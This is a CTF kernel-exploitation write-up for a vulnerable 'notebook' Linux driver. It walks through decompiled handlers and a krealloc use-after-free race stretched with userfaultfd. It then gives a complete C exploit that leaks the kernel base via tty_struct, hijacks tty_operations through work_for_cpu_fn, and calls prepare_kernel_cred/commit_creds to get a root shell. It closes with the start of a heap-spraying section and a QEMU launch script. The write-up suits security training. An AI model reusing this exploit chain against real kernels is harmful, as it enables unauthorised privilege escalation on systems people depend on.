.rodata:0000000000000800 ; Segment type: Pure data
.rodata:0000000000000800 ; Segment permissions: Read
.rodata:0000000000000800 _rodata segment align_32 public 'CONST' use64
.rodata:0000000000000800 assume cs:_rodata
.rodata:0000000000000800 ;org 800h
.rodata:0000000000000800 ; const file_operations mynote_fops
.rodata:0000000000000800 C0 09 00 00 00 00 00 00 00 00+mynote_fops file_operations <offset __this_module, 0, 0, offset mynote_write, 0, 0, 0, 0, 0, \
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+ ; DATA XREF: .data:mynote_dev↓o
.rodata:0000000000000800 00 00 00 00 80 00 00 00 00 00+ offset mynote_ioctl, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0>
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+_rodata ends
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+
__mcount_loc:00000000000008F8 ; ===========================================================================
__mcount_loc:00000000000008F8
__mcount_loc:00000000000008F8 ; Segment type: Pure data
__mcount_loc:00000000000008F8 ; Segment permissions: Read
__mcount_loc:00000000000008F8 __mcount_loc segment qword public 'CONST' use64
__mcount_loc:00000000000008F8 assume cs:__mcount_loc
__mcount_loc:00000000000008F8 ;org 8F8h
__mcount_loc:00000000000008F8 00 00 00 00 00 00 00 00 dq offset mynote_read
__mcount_loc:0000000000000900 80 00 00 00 00 00 00 00 dq offset mynote_write
__mcount_loc:0000000000000908 10 01 00 00 00 00 00 00 dq offset noteadd
__mcount_loc:0000000000000910 00 02 00 00 00 00 00 00 dq offset notedel
__mcount_loc:0000000000000918 80 02 00 00 00 00 00 00 dq offset noteedit
__mcount_loc:0000000000000920 90 03 00 00 00 00 00 00 dq offset notegift
__mcount_loc:0000000000000928 E0 03 00 00 00 00 00 00 dq offset mynote_ioctl
__mcount_loc:0000000000000930 74 04 00 00 00 00 00 00 dq offset mynote_init
__mcount_loc:0000000000000930 __mcount_loc ends

Let's go through them one by one :bomb:

mynote_init

This is the initialisation function, which registers a misc device:

int __cdecl mynote_init()
{
int v0; // ebx

_fentry__();
v0 = misc_register(&mynote_dev); // the kernel keeps a misc_list; misc_register links this device into it
_rwlock_init(&lock, "&lock", &krealloc); // initialise a reader-writer lock
printk("Welcome to BrokenNotebook!\n");
return v0;
}

This brings in the Linux reader-writer lock, rwlock.

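An rwlock has the following main properties:

  • Multiple readers may be in the critical section at the same time; they do not exclude each other.
  • A writer must wait until all readers have left before it can write.
  • While a write is in progress, readers arriving in the meantime are blocked, i.e. readers and writers exclude each other.
  • While a write is in progress, other writers arriving in the meantime are blocked, i.e. writers exclude each other.
  • Waiting never sleeps; waiters spin.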

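This is a bit like pedestrians at a crosswalk: the bus driver must stop and wait until every pedestrian has crossed before driving on. At busy times a continuous stream of pedestrians keeps the bus waiting indefinitely and can even cause a traffic jam.

This is also the main drawback of rwlock: writers have low priority and can starve in extreme cases. In other words, it is a reader-preferring lock.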

mynote_exit

The exit function, called when the driver is unloaded:

void __cdecl mynote_exit()
{
note *v0; // rbx
void *note; // rdi

v0 = notebook;
do
{
note = v0->note;
++v0;
kfree(note);
}
while ( v0 != &notebook[16] );
misc_deregister(&mynote_dev);
}

mynote_ioctl

The module provides its own ioctl handler:

__int64 __fastcall mynote_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
__int64 v3; // rdx
userarg notearg; // [rsp+0h] [rbp-28h] BYREF

_fentry__(file, cmd, arg);
copy_from_user(&notearg, v3, 24LL);
if ( cmd == 0x100 )
return noteadd(notearg.idx, notearg.size, notearg.buf);
if ( cmd <= 0x100 )
{
if ( cmd == 0x64 )
return notegift(notearg.buf);
}
else
{
if ( cmd == 0x200 )
return notedel(notearg.idx);
if ( cmd == 0x300 )
return noteedit(notearg.idx, notearg.size, notearg.buf);
}
printk("[x] Unknown ioctl cmd!\n");
return -100LL;
}

So a call to ioctl must pass a 24-byte structure, which is copied into notearg above:

notearg (0x18 bytes): idx (0x8) | size (0x8) | buf (0x8)

The following commands are available:
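  1. 0x100: calls noteadd with the fields of notearg, i.e. adds a notebook entry;
  2. 0x64: calls notegift, which leaks the contents of the notebook array. notebook is the array whose elements are note structures, and it contains a series of kernel heap addresses, so we get those for free 😊
  3. 0x200: calls notedel, which frees the kernel chunk for idx and uses that entry's size to decide whether to clear the pointer. In normal single-threaded use the size can never be 0 at deletion time, not even via noteedit;
  4. 0x300: calls noteedit with the fields of notearg to change the size (which must not end up 0) and the note of a notebook entry.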
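To make the 24-byte argument block concrete, here is a sketch of a user-space mirror of it, assuming x86-64 (8-byte size_t and pointers). The command values come from the decompiled switch above; the NOTE_* names and the note_cmd helper are hypothetical (the exploit later uses its own addnote/editnote wrappers):

```c
#include <assert.h>
#include <stddef.h>
#include <sys/ioctl.h>

/* Mirror of the block mynote_ioctl copies with copy_from_user(..., 24). */
struct userarg {
    size_t idx;   /* notebook index, at most 0xF for add/edit */
    size_t size;  /* requested chunk size */
    void  *buf;   /* user pointer: copied into name, or receives the gift dump */
};

/* Command values from the decompiled switch (names are hypothetical). */
enum {
    NOTE_GIFT = 0x64,
    NOTE_ADD  = 0x100,
    NOTE_DEL  = 0x200,
    NOTE_EDIT = 0x300,
};

static_assert(sizeof(struct userarg) == 24, "mynote_ioctl copies exactly 24 bytes");
static_assert(offsetof(struct userarg, buf) == 16, "buf is the third qword");

/* note_fd is assumed to be an open descriptor on /dev/notebook. */
long note_cmd(int note_fd, unsigned int cmd, size_t idx, size_t size, void *buf)
{
    struct userarg arg = { .idx = idx, .size = size, .buf = buf };
    return ioctl(note_fd, cmd, &arg);
}
```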

The notebook array itself consists of note structures:

note (0x10 bytes): note (pointer to the kmalloc'd chunk, 0x8) | size (0x8)

noteadd(read_lock)

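It takes our userarg structure. idx must not exceed 0xF, size must not exceed 0x60, and the entry's note pointer must still be empty; otherwise it returns an error.

If these checks pass, 256 bytes are copied from userarg.buf into name, a global in the module's .bss (not into the note itself), and kmalloc(size, _GFP*) allocates an object that becomes the note of the corresponding notebook entry. Note the order in the code: size is written into the entry first, and copy_from_user(name, ...) runs before the "note must be empty" check. The function only takes a read lock, which does not matter much here.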

__int64 __fastcall noteadd(size_t idx, size_t size, void *buf)
{
__int64 content_0; // rdx
__int64 content_1; // r13
note *note_addr; // rbx
size_t orig_size; // r14
__int64 ret_value; // rbx

(_fentry__)(idx, size, buf);
if ( idx > 0xF ) // idx is at most 0xF
{
ret_value = -1LL;
printk("[x] Add idx out of range.\n");
}
else
{
content_1 = content_0;
note_addr = &notebook[idx]; // notebook lives in .bss; take the address of entry idx
raw_read_lock(&lock);
orig_size = note_addr->size; // remember the old size so it can be restored
note_addr->size = size; // store the size we passed in
if ( size > 0x60 ) // size above 0x60: restore the old size and fail
{
note_addr->size = orig_size;
ret_value = -2LL;
printk("[x] Add size out of range.\n");
}
else
{
copy_from_user(name, content_1, 256LL); // name is another .bss global; our notearg.buf is copied into it
if ( note_addr->note ) // entry already in use: restore the size again
{
note_addr->size = orig_size;
ret_value = -3LL;
printk("[x] Add idx is not empty.\n");
}
else
{
note_addr->note = _kmalloc(size, 0x24000C0LL); // allocate the kernel chunk
printk("[+] Add success. %s left a note.\n", name);
ret_value = 0LL;
}
}
raw_read_unlock(&lock);
}
return ret_value;
}

notegift

This copies the contents of notebook to our userarg.buf; the challenge author is being generous :hibiscus:

__int64 __fastcall notegift(void *buf)
{
_fentry__(buf);
printk("[*] The notebook needs to be written from beginning to end.\n");
copy_to_user(buf, notebook, 256LL); // hands the whole notebook array, kernel pointers included, to user space
printk("[*] For this special year, I give you a gift!\n");
return 100LL;
}
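Since notegift copies exactly 256 bytes, the dump can be decoded with the note layout shown earlier: 16 entries of 16 bytes each, assuming x86-64. The helper names below are hypothetical. This is also why the exploit reads buf[2] to learn the address of note 1: entry i starts at qword 2*i.

```c
#include <assert.h>
#include <stddef.h>

/* Layout of one notebook entry as recovered from IDA (x86-64). */
struct note {
    void  *note;  /* kmalloc'd chunk */
    size_t size;
};

#define NOTEBOOK_ENTRIES 16

static_assert(sizeof(struct note) * NOTEBOOK_ENTRIES == 256,
              "notegift copies the whole notebook array");

/* dump is the 256-byte notegift output viewed as size_t[32]. */
size_t gift_note_addr(const size_t dump[2 * NOTEBOOK_ENTRIES], int i)
{
    return dump[2 * i];      /* notebook[i].note */
}

size_t gift_note_size(const size_t dump[2 * NOTEBOOK_ENTRIES], int i)
{
    return dump[2 * i + 1];  /* notebook[i].size */
}
```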

notedel(write_lock)

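Frees the chunk at the given idx. It first takes a write lock, then kfree()s that entry's note (the object goes back to its kmem_cache), and finally uses size to decide whether to clear the entry. In normal single-threaded use that size is never 0, not even after noteedit.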

__int64 __fastcall notedel(size_t idx)
{
note *v1; // rbx

_fentry__(idx);
if ( idx > 0x10 )
{
printk("[x] Delete idx out of range.\n");
return -1LL;
}
else
{
raw_write_lock(&lock);
v1 = &notebook[idx];
kfree(v1->note);
if ( v1->size ) // the entry is cleared only when size != 0
{
v1->size = 0LL;
v1->note = 0LL;
}
raw_write_unlock(&lock);
printk("[-] Delete success.\n");
return 0LL;
}
}

mynote_read

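Reads a note: the third argument of read(2), which arrives in rdx and is what IDA shows as idx, selects the note, and that note's contents are copied into our buf.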

ssize_t __fastcall mynote_read(file *file, char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 v4; // rdx
unsigned __int64 v5; // rdx
size_t size; // r13
void *note; // rbx

_fentry__(file, buf, idx);
if ( v4 > 0x10 )
{
printk("[x] Read idx out of range.\n");
return -1LL;
}
else
{
v5 = v4;
size = notebook[v5].size;
note = notebook[v5].note;
_check_object_size(note, size, 1LL);
copy_to_user(buf, note, size);
printk("[*] Read success.\n");
return 0LL;
}
}

mynote_write

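This is where data is actually written into a note's chunk; noteadd never writes anything into it. As with read, the third argument of write(2) is used as the index.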

ssize_t __fastcall mynote_write(file *file, const char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 v4; // rdx
unsigned __int64 v5; // rdx
size_t size; // r13
void *note; // rbx

_fentry__(file);
if ( v4 > 0x10 )
{
printk("[x] Write idx out of range.\n", buf);
return -1LL;
}
else
{
v5 = v4;
size = notebook[v5].size;
note = notebook[v5].note;
_check_object_size(note, size, 0LL);
if ( copy_from_user(note, buf, size) )
printk("[x] copy from user error.\n");
else
printk("[*] Write success.\n");
return 0LL;
}
}

noteedit(read_lock)

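It takes a read lock. The new name comes from userarg.buf, and krealloc is called to resize the chunk. Because size is checked for 0 afterwards (and the pointer is then cleared), simply passing size 0 does not give us a UAF.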

__int64 __fastcall noteedit(size_t idx, size_t newsize, void *buf)
{
__int64 v3; // rdx
__int64 v4; // r13
note *v5; // rbx
size_t size; // rax
__int64 v7; // r12
__int64 v8; // rbx

_fentry__(idx);
if ( idx > 0xF )
{
v8 = -1LL;
printk("[x] Edit idx out of range.\n", newsize);
return v8;
}
v4 = v3;
v5 = &notebook[idx];
raw_read_lock(&lock);
size = v5->size;
v5->size = newsize;
if ( size == newsize )
{
v8 = 1LL;
goto editout;
}
v7 = (*krealloc.gap0)(v5->note, newsize, 37748928LL); // krealloc: allocate newsize bytes, copy the old contents over and free the old chunk; if newsize is 0 it only frees the chunk (and returns ZERO_SIZE_PTR)
copy_from_user(name, v4, 256LL);
if ( !v5->size ) // size 0 is not accepted: the pointer gets cleared
{
printk("free in fact");
v5->note = 0LL;
v8 = 0LL;
goto editout;
}
if ( _virt_addr_valid(v7) )
{
v5->note = v7;
v8 = 2LL;
editout:
raw_read_unlock(&lock);
printk("[o] Edit success. %s edit a note.\n", name);
return v8;
}
printk("[x] Return ptr unvalid.\n");
raw_read_unlock(&lock);
return 3LL;
}

3. Exploitation idea

krealloc: anyone who has done userland pwn will recognise realloc here, and it behaves much the same way: it resizes a chunk, and if the new size is 0 it frees the chunk.

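Our analysis suggested that a zero size could lead to a UAF (notedel only clears the entry when size is non-zero, and noteedit frees the chunk via krealloc when the new size is 0), and that is indeed the case.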

Now consider the following scenario:

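  1. There are two threads, thread 1 and thread 2, and both access user memory through copy_from_user or copy_to_user.
  2. So the condition for touching user memory is met. There is a race here, but it is very hard to trigger: if we just let the threads run, hitting exactly the interleaving we want is complicated and unreliable. Even with only two threads, we need thread 2 to execute its statement z immediately after thread 1 executes statement n, and only then let thread 1 continue with statement n+1. It is easy to see how hard that is.
  3. It all comes down to time slices, which are very short and hard to predict, so we cannot control when threads switch. The idea, then, is to block thread 1 exactly when it reaches the statement we care about, let thread 2 run, and thereby obtain the sequence we need.
  4. This is what userfaultfd gives us: a monitor thread makes the faulting thread block, stretching the window between thread switches indefinitely so that we have plenty of time to do our work.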
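The idea of freezing thread 1 right after a chosen statement can be shown entirely in user space. In the sketch below, which is only an analogy and not part of the exploit, a semaphore wait stands in for the userfaultfd-induced stall: thread 1 runs step n and parks, thread 2 runs step z, and only then is thread 1 released to run step n+1. All names are hypothetical; the recorded trace is always n, z, n+1 regardless of how the scheduler behaves.

```c
#include <assert.h>
#include <pthread.h>
#include <semaphore.h>

static char trace[4];     /* order in which the steps ran, NUL-terminated */
static int trace_len;
static sem_t reached_n;   /* thread 1 -> main: "step n done, now stalled" */
static sem_t release_t1;  /* main -> thread 1: "resume", like a resolved fault */

static void *thread1(void *unused)
{
    (void)unused;
    trace[trace_len++] = 'n';
    sem_post(&reached_n);
    sem_wait(&release_t1);     /* stands in for the userfaultfd stall */
    trace[trace_len++] = '+';  /* step n+1 */
    return NULL;
}

static void *thread2(void *unused)
{
    (void)unused;
    trace[trace_len++] = 'z';
    return NULL;
}

/* Forces the interleaving n, z, n+1 and returns the recorded trace. */
const char *forced_interleaving(void)
{
    pthread_t t1, t2;

    trace_len = 0;
    sem_init(&reached_n, 0, 0);
    sem_init(&release_t1, 0, 0);

    pthread_create(&t1, NULL, thread1, NULL);
    sem_wait(&reached_n);      /* thread 1 is now parked after step n */
    pthread_create(&t2, NULL, thread2, NULL);
    pthread_join(t2, NULL);    /* step z runs while thread 1 waits */
    sem_post(&release_t1);     /* "resolve the fault" */
    pthread_join(t1, NULL);

    trace[trace_len] = '\0';
    sem_destroy(&reached_n);
    sem_destroy(&release_t1);
    return trace;
}
```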

4. Exploitation

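:one: Use mmap to create an anonymous mapping, pass it to the kernel, and register the region with userfaultfd, so that the thread touching it can be blocked at the right moment.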

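:two: If we pass size 0 to noteedit, it calls krealloc, which frees the original note->note chunk. It then calls copy_from_user, which touches the user pointer we passed; the monitor thread sees the page fault and the thread is suspended. At this point note->note still holds the address of the freed chunk and size is 0, which gives us a UAF. We still need to make size non-zero, though, because the stalled thread has to finish at some point, even if in theory we can hold it indefinitely. If size is still 0 when the userfaultfd handling completes, then according to IDA's decompilation noteedit clears our UAF pointer, which breaks the exploit.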

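To make size non-zero again we use noteadd: it writes the new size into the entry first and only then copies data from user space (copy_from_user(name, ...)), so triggering userfaultfd a second time at that point leaves the non-zero size in place.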

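:three: If the chunk we freed has a carefully chosen size such as 0x2e0, we can use tty_struct to leak the kernel base. So we open the ptmx device, which allocates a tty_struct that may reuse our freed chunk. When a tty_struct is initialised, its tty_operations pointer is set to one of two global tables, ptm_unix98_ops or pty_unix98_ops, and which one we get cannot be predicted, so the exploit has to check. One pitfall: these two globals do not show up in the symtable produced by objdump -d vmlinux > symtable; load vmlinux into IDA to look them up instead.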
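The kernel-base calculation can be written as a small pure function. The two unslid addresses are copied from the exploit below and are only valid for this challenge's vmlinux; the function name is hypothetical. It relies on the KASLR slide being (at least) page-aligned, so the low 12 bits of the leaked ops pointer tell the two tables apart. The leaked value is qword 3 (offset 0x18) of tty_struct, which the exploit reads as orig_tty_struct[3].

```c
#include <assert.h>
#include <stddef.h>

/* Unslid addresses from this challenge's vmlinux (taken from the exploit). */
#define PTM_UNIX98_OPS 0xFFFFFFFF81E8E440UL
#define PTY_UNIX98_OPS 0xFFFFFFFF81E8E320UL

/* tty_ops: leaked tty_struct->ops. Returns the KASLR slide. */
size_t kaslr_slide_from_tty_ops(size_t tty_ops)
{
    /* The slide does not change the low 12 bits, so they identify the table. */
    size_t base = ((tty_ops & 0xfff) == (PTM_UNIX98_OPS & 0xfff))
                      ? PTM_UNIX98_OPS
                      : PTY_UNIX98_OPS;
    return tty_ops - base;
}
```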

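One point that is hard to explain: getting the tty_struct into our chunk can fail (the exploit checks the 0x5401 magic and gives up if it does not match), as shown below: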

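:four: Once a tty_struct sits in the UAF chunk, we can place a fake tty_operations table in another note chunk (its address is leaked through the notebook array by notegift) and point the tty_struct at it. From then on we can overwrite any of its function pointers and use them as we like!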

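:five: Nearly every protection is enabled in this challenge, so building a chain is awkward. A handy trick here is work_for_cpu_fn, a function that is generally present in SMP kernels: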

__int64 __fastcall work_for_cpu_fn(__int64 a1)
{
__int64 result; // rax

_fentry__();
result = (*(a1 + 0x20))(*(a1 + 0x28));
*(a1 + 0x30) = result;
return result;
}

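This function calls the function pointer stored at rdi+0x20 with the value stored at rdi+0x28 as its argument, and stores the return value at rdi+0x30. Since tty_operations handlers normally receive the tty_struct as their first argument, we can call prepare_kernel_cred(NULL) and then commit_creds() in two separate rounds to escalate privileges, and afterwards simply return to user mode as usual. None of the usual ROP bypasses are needed and there is no need to hunt for lots of gadgets, which is very convenient.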
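To see why this primitive is convenient, here is a user-space model of work_for_cpu_fn. The struct is hypothetical and only its offsets matter: function pointer at +0x20, argument at +0x28, result at +0x30. In the kernel the first 0x20 bytes would belong to a struct work_struct; in the exploit the whole object is simply the hijacked tty_struct, which is why it writes prepare_kernel_cred into qword 4, the argument into qword 5, and later reads the result from qword 6 (buf[6]). demo_callee is a hypothetical stand-in for prepare_kernel_cred/commit_creds.

```c
#include <assert.h>
#include <stddef.h>

/* Only the offsets mirror work_for_cpu_fn; the padding replaces work_struct. */
struct fake_work_for_cpu {
    char   pad[0x20];
    long (*fn)(long);   /* +0x20: function to call */
    long   arg;         /* +0x28: its single argument */
    long   ret;         /* +0x30: where the result is stored */
};

static_assert(offsetof(struct fake_work_for_cpu, fn)  == 0x20, "fn at +0x20");
static_assert(offsetof(struct fake_work_for_cpu, arg) == 0x28, "arg at +0x28");
static_assert(offsetof(struct fake_work_for_cpu, ret) == 0x30, "ret at +0x30");

/* Same behaviour as the decompiled work_for_cpu_fn above. */
long model_work_for_cpu_fn(struct fake_work_for_cpu *w)
{
    w->ret = w->fn(w->arg);
    return w->ret;
}

/* Hypothetical callee used for demonstration. */
long demo_callee(long x)
{
    return x + 1;
}
```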

:six: Finally, restore the original tty_struct, return normally and call system to get a shell.

5. Result & Exploit

As the figure shows, this achieves reliable privilege escalation. Here is the full exploit:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <syscall.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <sched.h>

#define errExit(msg) do{ perror(msg); exit(EXIT_FAILURE); \
} while(0)

size_t commit_creds = 0;
size_t prepare_kernel_cred = 0;
int note_fd = 0;
int tty_fd = 0;
sem_t evil_add_sem, evil_edit_sem;
static char* page = "abcd";
static int page_size;

size_t PTM_UNIX98_OPS = 0xFFFFFFFF81E8E440;
size_t PTY_UNIX98_OPS = 0xFFFFFFFF81E8E320;
size_t WORK_FOR_CPU_FN = 0xffffffff8109eb90;
size_t PREPARE_KERNEL_CRED = 0xffffffff810a9ef0;
size_t COMMIT_CREDS = 0xffffffff810a9b40;

struct userarg{
size_t idx;
size_t size;
void* buf;
};


#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)

void saveStatus();
void info_log(char*);
void error_log(char*);
int userfaultfd_attack(char* addr, unsigned long len, void (*handler)(void *));
static void* fault_handler_thread(void * arg);
void addnote(size_t idx, size_t size, char* buf);
void editnote(size_t idx, size_t size, char* buf);
void deletenote(size_t idx);
void gift(char* buf);
void bind_cpu(int);

size_t user_cs, user_ss,user_rflags,user_sp;


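/* Saves user-mode CS/SS/RSP/RFLAGS; the inline asm is Intel syntax, so build
 * with -masm=intel. Not called here: this exploit returns to user mode normally. */
void saveStatus(){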
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
info_log("States has been saved successfully!");
}


void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
exit(1);
}


/* to run the exp on the specific core only */
void bind_cpu(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
info_log("CPU bind successfully");
}

int userfaultfd_attack(char* addr, unsigned long len, void (*handler)(void *)){
PRINT_ADDR("starting to monitor", addr);
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
pthread_t monitor_thread;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if(uffd == -1)
errExit("userfaultfd");

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if(ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");

/* Create a thread that will process the userfaultfd events */
s = pthread_create(&monitor_thread, NULL, handler, (void *)uffd);

info_log("create thread...");
if(s != 0){
errno = s;
errExit("pthread_create");
}
return 0;
}

static void* fault_handler_thread(void * arg){
static struct uffd_msg msg; /* data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long)arg;

/* Loop, handling incoming events on the userfaultfd file descriptor */
for(;;){
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if(nready == -1)
errExit("poll");

/* Read an event from the userfaultfd */
info_log("catch the user page fault!");
nread = read(uffd, &msg, sizeof(msg));

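/* Never resolve the fault: the faulting kernel thread stays blocked
 * inside copy_from_user, which keeps the race window open. */
sleep(10000);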
if(nread == 0){
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if(nread == -1)
errExit("read");

/* We expect only one kind of event; verify that assumption */
if(msg.event != UFFD_EVENT_PAGEFAULT){
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}

/* copy things to the addr */

uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
* So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1);

uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;

if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");

}
}

void addnote(size_t idx, size_t size, char* buf){
struct userarg userargs;
userargs.idx = idx;
userargs.size = size;
userargs.buf = buf;
ioctl(note_fd, 0x100, &userargs);
}

void gift(char* buf){
struct userarg userargs;
userargs.idx = 0;
userargs.size = 10;
userargs.buf = buf;
ioctl(note_fd, 0x64, &userargs);
}

void editnote(size_t idx, size_t size, char* buf){
struct userarg userargs;
userargs.idx = idx;
userargs.size = size;
userargs.buf = buf;
ioctl(note_fd, 0x300, &userargs);
}

void deletenote(size_t idx){
struct userarg userargs;
userargs.idx = idx;
userargs.size = 0x10;
userargs.buf = 0;
ioctl(note_fd, 0x200, &userargs);
}

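void* thread_add(void* uffd_arg){
sem_wait(&evil_add_sem);
/* noteadd stores size = 0x60 before copy_from_user(name, ...) faults on uffd_arg */
addnote(0, 0x60, uffd_arg);
return NULL;
}

void* thread_edit(void* uffd_arg){
sem_wait(&evil_edit_sem);
/* krealloc(note, 0) frees the chunk, then copy_from_user faults and blocks */
editnote(0, 0, uffd_arg);
return NULL;
}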


int main(void){
bind_cpu(0);
page_size = sysconf(_SC_PAGE_SIZE);
note_fd = open("/dev/notebook", 2);
size_t fake_tty_struct[0x100], orig_tty_struct[0x100];
size_t fake_tty_operations_addr;
size_t vmlinux_offset;
size_t buf[0x30] = {0};

/* construct a monitored zone */
char* user_mmap = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
userfaultfd_attack(user_mmap, 0x1000, fault_handler_thread);

/*init the semaphore, and the value firstly be given a zero*/
sem_init(&evil_add_sem, 0, 0);
sem_init(&evil_edit_sem, 0, 0);
pthread_t thread_1, thread_2;

pthread_create(&thread_1, NULL, thread_add, (void*)user_mmap);
pthread_create(&thread_2, NULL, thread_edit, (void*)user_mmap);

addnote(0, 0x50, buf);
editnote(0, 0x2e0, buf);

sem_post(&evil_edit_sem); //we could run the thread_edit to get a UAF
sleep(1);

sem_post(&evil_add_sem); //let thread_add turn the size from 0 back into a non-zero value
sleep(1);
/* now we have a freed 0x2e0 chunk whose size is non-zero, so open ptmx to get a tty_struct there */
info_log("try to get the tty_struct");
tty_fd = open("/dev/ptmx", 2);
if(tty_fd <=0){
error_log("ptmx open failed");
}
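read(note_fd, orig_tty_struct, 0); /* read()'s count argument is the note index */
if(*(int*)orig_tty_struct != 0x5401){ /* 0x5401 is TTY_MAGIC; the chunk may have gone to something else */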
error_log("pity,get a wrong tty!");
}
info_log("get right tty_struct!congratulation!");

/* get the kernel base offset */
vmlinux_offset = ((orig_tty_struct[3]&0xfff) == 0x440) ? (orig_tty_struct[3] - PTM_UNIX98_OPS): (orig_tty_struct[3] - PTY_UNIX98_OPS);
PRINT_ADDR("vmlinux_offset", vmlinux_offset);

/* hijack the tty_operations */
memcpy(fake_tty_struct, orig_tty_struct, 0x100);
addnote(1, 0x60, buf);
editnote(1, 0x2e0, buf);
gift(buf);
fake_tty_operations_addr = buf[2];
fake_tty_struct[3] = buf[2];

PRINT_ADDR("fake_tty_fops", fake_tty_struct[3]);
write(note_fd, fake_tty_struct,0);
buf[12] = WORK_FOR_CPU_FN + vmlinux_offset; /* qword 12 (+0x60) of tty_operations is ->ioctl in this kernel */
write(note_fd, buf, 1);
info_log("hijack done !");

/* construct the gadget */
/* prepare_kernel_cred(NULL) */
memcpy(fake_tty_struct, orig_tty_struct, 0x2e0);
fake_tty_struct[3] = fake_tty_operations_addr;
fake_tty_struct[4] = PREPARE_KERNEL_CRED + vmlinux_offset;
fake_tty_struct[5] = 0;
write(note_fd, fake_tty_struct, 0);
ioctl(tty_fd, 0x114514, 0x114514); /* unknown cmd reaches tty->ops->ioctl(tty, ...), i.e. work_for_cpu_fn(tty_struct) */

/* commit_creds */
read(note_fd, buf, 0);
fake_tty_struct[5] = buf[6]; /* qword 6 (+0x30) holds prepare_kernel_cred's return value */
fake_tty_struct[4] = COMMIT_CREDS + vmlinux_offset;
write(note_fd, fake_tty_struct, 0);
ioctl(tty_fd, 0x123, 0x123);

/* privilege escalation finished */
/* recover the tty_struct */
write(note_fd, orig_tty_struct, 0);
system("/bin/sh");
}

V. Kernel Heap - Heap Spraying

In computer security, heap spraying is a technique used in exploits to facilitate arbitrary code execution. The part of the source code of an exploit that implements this technique is called a heap spray.[1] In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process’s heap and fill the bytes in these blocks with the right values.

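The above is the Wikipedia definition of heap spraying. In short, heap-spraying code tries to get a chosen byte sequence to a predictable location by making the target allocate (large) blocks on its heap and filling them with suitable values.

Heap spraying is not an exploitation primitive in itself but an auxiliary technique: when a program has a clear bug that is hard to exploit, spraying can make exploitation much easier. We will learn it through the following example.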
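To make the idea concrete without touching a real kernel, here is a toy model. It is entirely hypothetical and not SLUB's actual code: a fixed-size slab whose free list is LIFO, similar in spirit to how a freed kmalloc object tends to be handed out again to the next allocation of the same size. The victim slot is freed while a stale pointer to it is kept; spraying a handful of same-size objects filled with a marker then reclaims that slot, so the stale pointer now sees attacker-controlled bytes.

```c
#include <assert.h>
#include <string.h>

#define SLOTS     16
#define SLOT_SIZE 64

/* Toy slab: SLOTS objects of SLOT_SIZE bytes with a LIFO free list. */
static unsigned char slab[SLOTS][SLOT_SIZE];
static int free_list[SLOTS];
static int free_top;

void toy_slab_init(void)
{
    free_top = 0;
    for (int i = SLOTS - 1; i >= 0; i--)  /* slot 0 ends up on top */
        free_list[free_top++] = i;
}

void *toy_alloc(void)
{
    if (free_top == 0)
        return NULL;
    return slab[free_list[--free_top]];
}

void toy_free(void *p)
{
    int idx = (int)(((unsigned char (*)[SLOT_SIZE])p) - slab);
    free_list[free_top++] = idx;  /* most recently freed is reused first */
}

/* Spray n objects, each filled with the byte marker. */
void toy_spray(int n, unsigned char marker)
{
    for (int i = 0; i < n; i++) {
        unsigned char *obj = toy_alloc();
        if (obj)
            memset(obj, marker, SLOT_SIZE);
    }
}
```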

Example: RWCTF 2023 trial round - Digging into kernel 3

1. Reversing the challenge

First, the startup script:

#!/bin/sh                                                                               

qemu-system-x86_64 \
-m 128M \
-nographic \
-kernel ./bzImage \
--enable-kvm \
-initrd ./rootfs.img \
-cpu kvm64,+smap,+smep \
-monitor /dev/null \
-append 'console=ttyS0 kaslr kpti=1 quiet oops=panic panic=1 init=/init' \
-no-reboot \
-snapshot \
-s

